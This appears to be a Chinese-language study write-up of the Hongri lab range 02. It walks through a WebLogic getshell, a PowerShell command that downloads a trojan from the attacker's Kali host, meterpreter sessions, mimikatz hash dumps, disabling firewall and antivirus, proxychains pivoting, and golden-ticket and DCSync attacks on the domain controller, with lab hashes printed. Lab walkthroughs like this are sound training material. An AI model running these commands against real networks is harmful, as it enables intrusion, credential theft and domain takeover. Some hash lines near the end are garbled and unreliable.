文章目录
红日靶场02
0、环境搭建
靶场下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/
默认密码:1qaz@WSX
先配通IP,
默认没有开启Web服务,来到C:\Oracle\Middleware\user_projects\domains\base_domain\bin 路径,使用管理员依次执行
一、外网域
1.扫描端口
nmap 192.168.111.80 -sT -Pn
nmap 192.168.111.201 -sT -Pn
nmap 192.168.111.80 --script vuln
root@kali:~# nmap --script vuln 192.168.111.80
Starting Nmap 7.80 ( https://nmap.org ) at 2021-10-05 05:14 EDT
Stats: 0:00:01 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan
Parallel DNS resolution of 1 host. Timing: About 0.00% done
Stats: 0:00:02 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan
Parallel DNS resolution of 1 host. Timing: About 0.00% done
Nmap scan report for 192.168.111.80
Host is up (0.00016s latency).
Not shown: 990 filtered ports
PORT STATE SERVICE
80/tcp open http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn’t find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn’t find any DOM based XSS.
|_http-stored-xss: Couldn’t find any stored XSS vulnerabilities.
135/tcp open msrpc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp open netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp open microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1433/tcp open ms-sql-s
|clamav-exec: ERROR: Script execution failed (use -d to debug)
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: VULNERABLE
| IDs: CVE:CVE-2014-3566 BID:70574
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the “POODLE” issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_3DES_EDE_CBC_SHA
| References:
| https://www.imperialviolet.org/2014/10/14/poodle.html
| https://www.securityfocus.com/bid/70574
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
| https://www.openssl.org/~bodo/ssl-poodle.pdf
|_sslv2-drown:
|_tls-ticketbleed: ERROR: Script execution failed (use -d to debug)
3389/tcp open ms-wbt-server
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown:
49152/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49153/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49154/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49155/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:78:A0:52 (VMware)Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/Nmap done: 1 IP address (1 host up) scanned in 156.64 seconds
尝试ms17
连招,失败
use auxiliary/scanner/smb/smb_ms17_010
set rhost 192.168.111.80
run
2.目录扫描
无有效信息
gobuster dir -u http://192.168.111.80 -w /usr/share/wordlists/dirbuster/apache-user-enum-1.0.txt
3.Weblogic getshell
逐个访问端口
发现7001
端口存在weblogic
Weblogic常用端口:7001
Weblogic后台登录地址:
输入 http://your-ip:7001/console 即可进入后台
上网寻找相关漏洞及利用工具(脚本小子已就位)
漏洞检测工具
利用工具,尝试执行命令成功
但是无法上传文件
利用getshell
脚本获得webshell
在kali
开启web
服务
让web机
访问下载
powershell (new-object Net.WebClient).DownloadFile('http://192.168.111.128/r.exe','C:\1.exe')
4.建立MSF会话
上传后使用webshell
运行木马
msf
建立监听
成功建立会话
5.获取hash
迁移进程
加载mimikatz
kiwi
hashdump
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
de1ay:1000:aad3b435b51404eeaad3b435b51404ee:3b24c391862f4a8531a245a0217708c4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
wdigest
6.远程桌面连接
开启远程桌面
run post/windows/manage/enable_rdp
rdesktop 192.168.111.80
关闭防火墙,defender,360
7. 收集跳板机信息
查看安装应用
run post/windows/gather/enum_applications
获取登陆过的用户信息
run post/windows/gather/enum_logged_on_users
二、内网域
0.收集内网信息
ifconfig
发现 web机
存在内网域 10.10.10.0/24
列出域内成员
run post/windows/gather/enum_ad_computers
定位域控
run post/windows/gather/enum_domain
同网段主机探活
尝试访问dc
1. 建立路由,配置代理
run autoroute -s 10.10.10.0/24
配置 proxychains.conf
文件
扫描 dc
,扫描时间较长,可以先进行其他操作
nmap 10.10.10.10 -sT -Pn
开启代理后若使用
nmap
出错,可尝试 修改proxychains.conf
注释proxy_dns
2. 黄金票据攻击
尝试制作黄金票据
dcsync_ntlm krbtgt
[+] Account : krbtgt
[+] NTLM Hash : 82dfc71b72a11ef37d663047bc2088fb
[+] LM Hash : 9b5cd36575630d629f3aa6d769ec91c3
[+] SID : S-1-5-21-2756371121-2868759905-3853650604-502
[+] RID : 502
这里第一次制作时出现制作失败的情况(可能因为当时域用的是de1ay).第二次成功
golden_ticket_create -d de1ay.com -u gui -s S-1-5-21-2756371121-2868759905-3853650604 -k 82dfc71b72a11ef37d663047bc2088fb -t /home/kali/Desktop/hongri.ticket
导入票据,访问dc
发现无法访问
CMD does not support UNC paths as current directories.
问题原因及解决方法:
在开始使用cd命令跳转到UNC目录时,会出现"CMD does not support UNC paths as current directories."的提示,即cd命令只能在本地目录跳转,却不能跳转到UNC目录。
那如何是好?看第二个命令:pushd,使用"pushd unc_path"可以将UNC路径映射成本地的Z盘,执行该命令后,下一个提示符就不是原来的C:>,而是Z:>,即已经映射成功的UNC路径。
这时,就可以像操作本地目录一样操作UNC目录了(实际上在“我的电脑”中会出现一个Z盘的映射,相当于本地硬盘)。如图中所示,cd、dir等命令均可以使用。
net use k: \\dc\c$ /user:administrator
执行成功
远程桌面登录web机
,进行操作
3. 上传木马
制作正向连接的木马
msfvenom -p windows/meterpreter/bind_tcp lport=13777 -f exe > /root/d.exe
kali
--> Web
upload /root/d.exe c:\d.exe
Web
–> dc
利用远程桌面 将木马传到 映射的dc
磁盘中
msf
建立监听
这里我一开始以为在映射磁盘k中运行木马即可获得
dc
会话,在msf窗口等了好久也没等到建立连接直到尝试
rhost
改成web机
立刻就获得会话,才突然反应过来,自己刚刚的想法有多天真可笑我们可以通过使用映射网络络驱动器功能(磁盘映射)将网络共享文件夹,局域网共享文件,但只是共享文件夹,运行仍然是在本机上
4. 正向连接
尝试使用 ms17_010_command
尝试运行木马
成功建立连接
5. 获取hash
迁移进程
加载mimikatz
kiwi
hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e7114141b0337bdce1aedf5594706205:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:82dfc71b72a11ef37d663047bc2088fb:::
de1ay:1001:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
mssql:2103:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
DC : 1002 : a a d 3 b 435 b 51404 e e a a d 3 b 435 b 51404 e e : 58743 e 6 c 5 e 776 a 472 e 3 b d 957 b 96 e a a b b : : : P C :1002:aad3b435b51404eeaad3b435b51404ee:58743e6c5e776a472e3bd957b96eaabb::: PC :1002:aad3b435b51404eeaad3b435b51404ee:58743e6c5e776a472e3bd957b96eaabb:::PC:1105:aad3b435b51404eeaad3b435b51404ee:e27bd7933be6ce598658108e424e5a2a:::
WEB$:1603:aad3b435b51404eeaad3b435b51404ee:c4b073b9fda2d93be9c6af076d2bdf52:::
wdigest
6.远程桌面
开启远程桌面
run post/windows/manage/enable_rdp
报错
Failed to connect, CredSSP required by server (check if server has disabled old TLS versions, if yes use -V option).
原因:勾选了这个选项(仅允许运行使用网络级别身份验证的远程桌面的计算机连接(建议)(N))
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-gF8OIJY3-1633497766805)(C:\Users\HP\Desktop\学习笔记\网安\靶场\红日\hongri02\红日靶场02.assets\02_36.png)]
解决方法:
使用
remmina
连接即可(未进行实际操作)apt install remmina